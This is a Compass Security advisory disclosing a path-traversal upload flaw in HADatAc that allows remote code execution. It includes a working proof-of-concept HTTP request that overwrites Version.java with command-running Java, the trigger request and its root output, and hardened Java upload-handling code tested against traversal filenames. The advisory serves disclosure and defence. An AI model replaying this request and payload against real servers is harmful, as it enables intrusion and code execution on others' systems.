#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  HADatAc [1]
# CSNC ID:  CSNC-2018-031
# Subject:  Remote code execution
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Lukasz D. (advisories@compass-security.com)
# Date:     14.11.2018
#
#############################################################

Introduction:
-------------
HADatAc (Human-Aware Data Acquisition framework) is an open-source
infrastructure that enables combined acquisition of data and metadata in a
way that keeps the metadata properly and logically connected to the data.
HADatAc is built mainly for scientific research teams but can be used by
anyone handling incoming data sets of physical measurements. [1]

Servers running the HADatAc framework were found to be vulnerable to a
remote code execution attack. Authenticated users of the framework could
manipulate the file upload process and overwrite arbitrary files on the
server. Consequently, an attacker could replace source code files of HADatAc
and trick the server into executing malicious code.

Affected:
---------
The following HADatAc versions are vulnerable:
- 1.0.1 through 1.0.22

Technical Description:
----------------------
The framework tries to store user-provided files inside the
"unprocessed_csv" folder. However, the path where the uploaded file will be
saved is constructed from the "resumableFilename" parameter of the request
without validation. As such, an attacker can perform a path traversal attack
and make the server save the uploaded file in an arbitrary location on the
server. In particular, files containing HADatAc code may be overwritten with
user-provided content.

If HADatAc is running in Development mode, it suffices to overwrite one of
the Java source files, since Play recompiles changed sources on the next
request in that mode.
Request to overwrite the Version.java file:

POST /hadatac/annotator/uploadfile?resumableChunkNumber=1&resumableChunkSize=1&
resumableCurrentChunkSize=1&resumableTotalSize=1&resumableType=1&
resumableIdentifier=1&resumableRelativePath=1&
resumableFilename=../app/org/hadatac/console/controllers/Version.java HTTP/1.1
Host: [CUT]
Content-Type: application/octet-stream
Content-Length: 546
Cookie: PLAY_SESSION=[CUT]
Connection: close

package org.hadatac.console.controllers;

import play.mvc.Controller;
import play.mvc.Result;
import java.io.*;

public class Version extends Controller {

    public Result index() {
        try {
            Process p = Runtime.getRuntime().exec("id");
            InputStreamReader isr = new InputStreamReader(p.getInputStream());
            BufferedReader stdInput = new BufferedReader(isr);
            return ok("Output: " + stdInput.readLine());
        } catch (IOException e) {}
        return ok("Command Error");
    }

    public Result postIndex() {
        return index();
    }
}

Response:

HTTP/1.1 200 OK
Content-Length: 15
Content-Type: text/plain; charset=utf-8
Connection: close
Date: Mon, 01 Oct 2018 13:37:13 GMT

Upload finished

Request to execute the uploaded file:

GET /hadatac/version HTTP/1.1
Host: [CUT]
Cookie: PLAY_SESSION=[CUT]
Connection: close

The response shows that the command contained in the uploaded file was
executed:

HTTP/1.1 200 OK
Content-Length: 46
Content-Type: text/plain; charset=utf-8
Connection: close
Date: Mon, 01 Oct 2018 13:37:37 GMT

Output: uid=0(root) gid=0(root) groups=0(root)

If HADatAc is deployed in Production mode, source files are no longer
compiled at runtime; instead, a JAR file in the ../lib/ directory has to be
overwritten.

Workaround / Fix:
-----------------
The server must ensure that all files uploaded by HADatAc users are stored in
the intended directory, by validating the filename and thus preventing path
traversal attacks. Moreover, only expected types of files should be accepted
by the server. The proof of concept above also shows the service running as
root; running it under an unprivileged account limits what a successful
upload can overwrite.
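The vulnerable and hardened path handling side by side, as an added
illustration written for this advisory (it is neither HADatAc's code nor the
vendor's patch [2]): the upload directory, the CSV-only allowlist and the
method names are assumptions. It feeds the advisory's own payload filename
through both variants so the traversal, an absolute-path variant and a
disallowed file type can be seen being rejected.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.Set;

public class SafeUpload {

    // Assumption: the upload endpoint only expects CSV data files.
    private static final Set<String> ALLOWED_EXTENSIONS = Set.of("csv");

    // Vulnerable pattern: the request parameter is used as a path component
    // unchecked, so "../" walks out of the upload folder and an absolute
    // name replaces the base directory entirely.
    static Path vulnerableTarget(Path baseDir, String resumableFilename) {
        return baseDir.resolve(resumableFilename).normalize();
    }

    // Hardened pattern: refuse any directory component, allowlist the
    // extension, then confirm the normalized target is still inside baseDir.
    static Path safeTarget(Path baseDir, String resumableFilename) {
        Path base = baseDir.toAbsolutePath().normalize();
        if (resumableFilename.isEmpty()
                || resumableFilename.contains("/")
                || resumableFilename.contains("\\")) {
            throw new IllegalArgumentException(
                    "filename must be a bare name without path separators");
        }
        int dot = resumableFilename.lastIndexOf('.');
        String ext = dot < 0 ? "" : resumableFilename.substring(dot + 1).toLowerCase();
        if (!ALLOWED_EXTENSIONS.contains(ext)) {
            throw new IllegalArgumentException("file type not allowed: " + resumableFilename);
        }
        Path target = base.resolve(resumableFilename).normalize();
        // Defence in depth: even with separators rejected, never trust a
        // target that does not start with the upload directory.
        if (!target.startsWith(base)) {
            throw new IllegalArgumentException("path escapes upload directory");
        }
        return target;
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample: a scratch directory standing in for unprocessed_csv.
        Path base = Files.createTempDirectory("unprocessed_csv");
        String[] names = {
            "measurements.csv",
            "../app/org/hadatac/console/controllers/Version.java", // advisory payload
            "/etc/cron.d/evil",                                    // absolute-path variant
            "Version.java",                                        // wrong type, no traversal
        };
        for (String name : names) {
            System.out.println("input: " + name);
            System.out.println("  vulnerable -> " + vulnerableTarget(base, name));
            try {
                System.out.println("  hardened   -> " + safeTarget(base, name));
            } catch (IllegalArgumentException e) {
                System.out.println("  hardened   -> rejected: " + e.getMessage());
            }
        }
    }
}
```

Rejecting names with separators outright, rather than silently stripping them
to the last component, is deliberate: a traversal attempt is an attack signal
worth logging, not input to be repaired.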
Timeline:
---------
2018-10-01: Vulnerability discovered
2018-10-01: Initial vendor notification
2018-10-16: Initial vendor response
2018-10-25: Patched version released [2]
2018-11-14: Public disclosure

References:
-----------
[1]: https://www.hadatac.org
[2]: https://github.com/paulopinheiro1234/hadatac/commit/1b621e06984eddeef995ba88916d9f44965e21a4